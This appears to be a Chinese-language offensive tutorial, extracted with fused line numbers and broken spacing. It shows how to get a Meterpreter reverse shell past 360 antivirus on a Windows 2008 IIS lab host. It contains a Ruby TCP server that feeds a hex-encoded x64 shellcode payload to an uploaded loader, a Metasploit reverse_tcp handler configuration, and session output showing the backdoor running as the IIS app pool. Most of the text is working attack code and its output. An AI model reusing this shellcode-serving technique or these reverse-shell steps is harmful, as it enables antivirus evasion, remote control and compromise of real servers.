靶机mscorsvw

专注APT攻击与防御https://micropoor.
blogspot.
com/攻击机:192.
168.
1.
4Debian靶机:192.
168.
1.
2Windows2008目标机安装:360卫士+360杀毒12[*]磁盘列表[C:D:E:]34C:\inetpub\wwwroot\>tasklist56映像名称PID会话名会话#内存使用78SystemIdleProcess0024K9System40372K10smss.
exe2360956K11csrss.
exe32405,572K12csrss.
exe364114,452K13wininit.
exe37204,508K14winlogon.
exe40815,364K15services.
exe46807,376K16lsass.
exe47609,896K17lsm.
exe48403,876K18svchost.
exe57608,684K19vmacthlp.
exe63203,784K20svchost.
exe67607,384K21svchost.
exe764012,716K22svchost.
exe800029,792K23svchost.
exe848011,248K24svchost.
exe90009,308K25svchost.
exe940016,184K26svchost.
exe332011,800K27spoolsv.
exe548015,568K28svchost.
exe105208,228K29svchost.
exe107608,808K30svchost.
exe114402,576K31VGAuthService.
exe1216010,360K32vmtoolsd.
exe1300018,068K33ManagementAgentHost.
exe133208,844K34svchost.
exe1368011,884K35WmiPrvSE.
exe1768013,016K36dllhost.
exe1848011,224K37msdtc.
exe194007,736K38WmiPrvSE.
exe1440019,768K39mscorsvw.
exe29604,732K40mscorsvw.
exe58405,088K41sppsvc.
exe147608,408K42taskhost.
exe261216,344K43dwm.
exe286814,604K44explorer.
exe2896144,912K45vmtoolsd.
exe3008117,744K46TrustedInstaller.
exe2268015,776K47360Tray.
exe268416,056K48360sd.
exe263611,316K49ZhuDongFangYu.
exe2456014,292K50360rp.
exe1712127,072K51SoftMgrLite.
exe864116,816K52w3wp.
exe3300042,836K53svchost.
exe384004,584K54notepad.
exe371215,772K55cmd.
exe338402,376K56conhost.
exe352003,420K57tasklist.
exe309605,276K581C:\>dir2驱动器C中的卷没有标签.
3卷的序列号是C6F8‐9BAB45C:\的目录672017/12/1303:28inetpub82009/07/1411:20PerfLogs92017/12/1303:28ProgramFiles102019/01/2314:09ProgramFiles(x86)112019/01/2314:15Users122017/12/1303:25Windows130个文件0字节146个目录21,387,132,928可用字节15目标机位x64位Windows20081C:\>ver23MicrosoftWindows[版本6.
1.
7600]配置payload:1root@John:/var/www/html#cat.
/Micropoor_rev.
rb2require'socket'3ifARGV.
empty4puts"Usage:"5puts"Micropoor.
rbport"6exit7end89PORT=ARGV.
first.
to_i1011defhandle_connection(client)12puts"Payloadison‐line#{client}"1314client.
write("4831c94881e9c0ffffff488d05efffffff48bb32667fcceeadb9f748315827482df8ffffffe2f4ce2efc281e4575f732663e9daffdeba6642e4e1e8be532a5522ef49ef6e532a5122ef4bebee5b640782c32fd27e588379e5a1eb0ec8199b6f3af728def6c5b1a60272e8465ff997c705a37cd3ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a60baba6ac69a7b92e678865ed99be33b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec783e3f277e0dd64dcc067e6533e8e6e8802647be278865ed9dbe33b6198d65a1f1b3b9266385ef7df87c36ee37cd3eece1b66a382696aff5f8ae733c374f028df8a5cd86278db7f7f17c208f34331152e4be8c110cfeb19e8bf732272985674bf176dec67ecceee430127bda7dccee98795f33623e98a7245dbbbb973e76a2da9ff0cdb3334504c5b8f63266268d5484399c3299aaa6e4ece7a7622b4e05a39c79bfcda637452ce546377aefbe8d5447b628d299aa84676ad3e7733e33450ce5300e73dce6699acc4622b7a60bc6a7527782d78eeccceeadf174de7637450ce0883e58623e94a62440b68864a604b1526c74ca660199a62e7dd76cef89a6aeece09f32767fccaff5f17ec02e4e05af17e15361838019a6247abebba132fd27e430077aefa5846754f84d30bfb79311783a0f321b5794affae09f32267fccaff5d3f76827c5c7c1a28908e731268d54d8d7ba5399aa85116350cbcd998084ef6ef1def42efa3a9b19f808d53e15ccb7e47e35c2d3dd9a1178b9f7")15client.
close16end1718socket=TCPServer.
new('0.
0.
0.
0',PORT)19puts"Listeningon#{PORT}.
"2021whileclient=socket.
accept22Thread.
new{handle_connection(client)}23end2425root@John:/var/www/html#ruby.
/Micropoor_rev.
rb808026Listeningon8080.
27上传Micropoor_shellcode_x64.
exe配置msf:1msfexploit(multi/handler)>useexploit/multi/handler2msfexploit(multi/handler)>setpayloadwindows/x64/meterpreter/reverse_tcp3payload=>windows/x64/meterpreter/reverse_tcp4msfexploit(multi/handler)>showoptions56Moduleoptions(exploit/multi/handler):78NameCurrentSettingRequiredDescription9101112Payloadoptions(windows/x64/meterpreter/reverse_tcp):1314NameCurrentSettingRequiredDescription1516EXITFUNCprocessyesExittechnique(Accepted:'',seh,thread,process,none)17LHOST192.
168.
1.
4yesThelistenaddress(aninterfacemaybespecified)18LPORT53yesThelistenport192021Exploittarget:2223IdName24‐‐‐‐‐‐250WildcardTarget262728msfexploit(multi/handler)>exploit2930[*]StartedreverseTCPhandleron192.
168.
1.
4:5331靶机执行:1msfexploit(multi/handler)>exploit23[*]StartedreverseTCPhandleron192.
168.
1.
4:534[*]Sendingstage(206403bytes)to192.
168.
1.
25[*]Meterpretersession6opened(192.
168.
1.
4:53‐>192.
168.
1.
2:49744)at2019‐01‐2301:29:00‐050067meterpreter>getuid8Serverusername:IISAPPPOOL\DefaultAppPool9meterpreter>sysinfo10Computer:WIN‐5BMI9HGC42S11OS:Windows2008R2(Build7600).
12Architecture:x6413SystemLanguage:zh_CN14Domain:WORKGROUP15LoggedOnUsers:116Meterpreter:x64/windows17meterpreter>ipconfig1819Interface12021Name:SoftwareLoopbackInterface122HardwareMAC:00:00:00:00:00:0023MTU:429496729524IPv4Address:127.
0.
0.
125IPv4Netmask:255.
0.
0.
026IPv6Address:::127IPv6Netmask:ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff282930Interface113132Name:Intel(R)PRO/1000MTNetworkConnection33HardwareMAC:00:0c:29:bc:0d:5c34MTU:150035IPv4Address:192.
168.
1.
236IPv4Netmask:255.
255.
255.
037IPv6Address:fe80::5582:70c8:a5a8:822338IPv6Netmask:ffff:ffff:ffff:ffff::391meterpreter>ps23ProcessList456PIDPPIDNameArchSessionUserPath7800[SystemProcess]940System102364smss.
exe11296468mscorsvw.
exe12324316csrss.
exe13332468svchost.
exe14364356csrss.
exe15372316wininit.
exe16408356winlogon.
exe17468372services.
exe18476372lsass.
exe19484372lsm.
exe20548468spoolsv.
exe21576468svchost.
exe22584468mscorsvw.
exe23632468vmacthlp.
exe24676468svchost.
exe25764468svchost.
exe26800468svchost.
exe27848468svchost.
exe288642684SoftMgrLite.
exe29900468svchost.
exe30940468svchost.
exe311052468svchost.
exe321076468svchost.
exe331144468svchost.
exe341216468VGAuthService.
exe351300468vmtoolsd.
exe361332468ManagementAgentHost.
exe371368468svchost.
exe381440576WmiPrvSE.
exe391476468sppsvc.
exe4017122636360rp.
exe411768576WmiPrvSE.
exe421848468dllhost.
exe431940468msdtc.
exe442456468ZhuDongFangYu.
exe452612468taskhost.
exe4626361096360sd.
exe4726841096360Tray.
exe4827883408Micropoor_shellcode_x64.
exex640IISAPPPOOL\DefaultAppPoolC:\inetpub\wwwroot\Micropoor_shellcode_x64.
exe492868900dwm.
exe5028962852explorer.
exe5130082896vmtoolsd.
exe523196468svchost.
exe5333001368w3wp.
exex640IISAPPPOOL\DefaultAppPoolc:\windows\system32\inetsrv\w3wp.
exe5434083300cmd.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\cmd.
exe5537122896notepad.
exe564092324conhost.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\conhost.
exe5758meterpreter>59靶机:附录:Micropoor_shellcodeforpayloadbackdoorhttps://micropoor.
blogspot.
com/2019/01/micropoorshellcode-for-payload-backdoor.
htmlMicropoor